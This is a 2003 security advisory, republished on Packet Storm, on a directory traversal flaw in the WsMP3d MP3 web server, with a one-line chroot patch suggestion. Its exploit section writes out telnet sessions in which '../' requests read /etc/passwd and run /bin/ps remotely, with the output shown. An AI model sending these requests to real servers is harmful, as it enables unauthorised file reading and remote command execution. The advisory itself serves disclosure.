INetCop Security Advisory #2003-0x82-017.a - WsMP3d, a web server that streams MP3s much like shoutcast but is GPL, suffers from a directory traversal vulnerability that not only allows viewing of files outside of the webroot, but allows for remote command execution as well.
bc72d07b2004ab7e987341e534050ec07ea4699fd37effc980c5656ccf6a0bd6
==========================================
INetCop Security Advisory #2003-0x82-017.a
==========================================
* Title: WsMP3d Directory Traversing Vulnerability
0x01. Description
WsMp3d is daemon that can enjoy mp3.
This daemon can approach in web, directory traversing bug exists.
Also, can execute command in remote.
0x02. Vulnerable Packages
Vendor site: http://wsmp3.sourceforge.net/
WsMp3-0.0.10.tar.gz version.
+Linux
WsMp3-0.0.9.tar.gz version.
WsMp3-0.0.8.tar.gz version.
web_server-0.0.7.tar.gz version.
web_server-0.0.6.tar.gz version.
web_server-0.0.5.tar.gz version.
web_server-0.0.4.tar.gz version.
web_server-0.0.3.tar.gz version.
web_server-0.0.2.tar.gz version.
web_server-0.0.1.tar.gz version.
0x03. Exploit
#1) Directory traversing exploit:
As following, see file in directory.
http://wsmp3.server.com/cmd:ls
In this way, use directory that know.
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
GET /dir/../../../../../../etc/passwd HTTP/1.0
... passwd file here ...
Ok, it's possible to read `/etc/passwd' file !
If it's executed by root ?? hehehe ;-)
#2) Remote execute command exploit:
bash$ telnet wsmp3.server.com 8000
Trying 61.37.xxx.xx...
Connected to 61.37.xxx.xx.
Escape character is '^]'.
POST /dir/../../../../../../bin/ps HTTP/1.0
HTTP/1.1 200 OK
Connection: close
Content-Type: text/html
Date: Sat May 03 01:25:28 2003
Last-Modified: Sat May 03 01:25:28 2003
Content-Length: 201
PID TTY TIME CMD
29529 pts/2 00:00:00 login
29559 pts/2 00:00:00 su
29560 pts/2 00:00:00 bash
29681 pts/2 00:00:10 WsMp3
29730 pts/2 00:00:00 WsMp3
29731 pts/2 00:00:00 ps
Connection closed by foreign host.
bash$
0x04. Patch
It can solve as chroot() function. :-)
P.S: Sorry, for my poor english.
--
By "dong-houn yoU" (Xpl017Elz), in INetCop(c) Security.
MSN & E-mail: szoahc(at)hotmail(dot)com,
xploit(at)hackermail(dot)com
INetCop Security Home: http://www.inetcop.org (Korean hacking game)
My World: http://x82.i21c.net & http://x82.inetcop.org
GPG public key: http://x82.inetcop.org/h0me/pr0file/x82.k3y
--
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed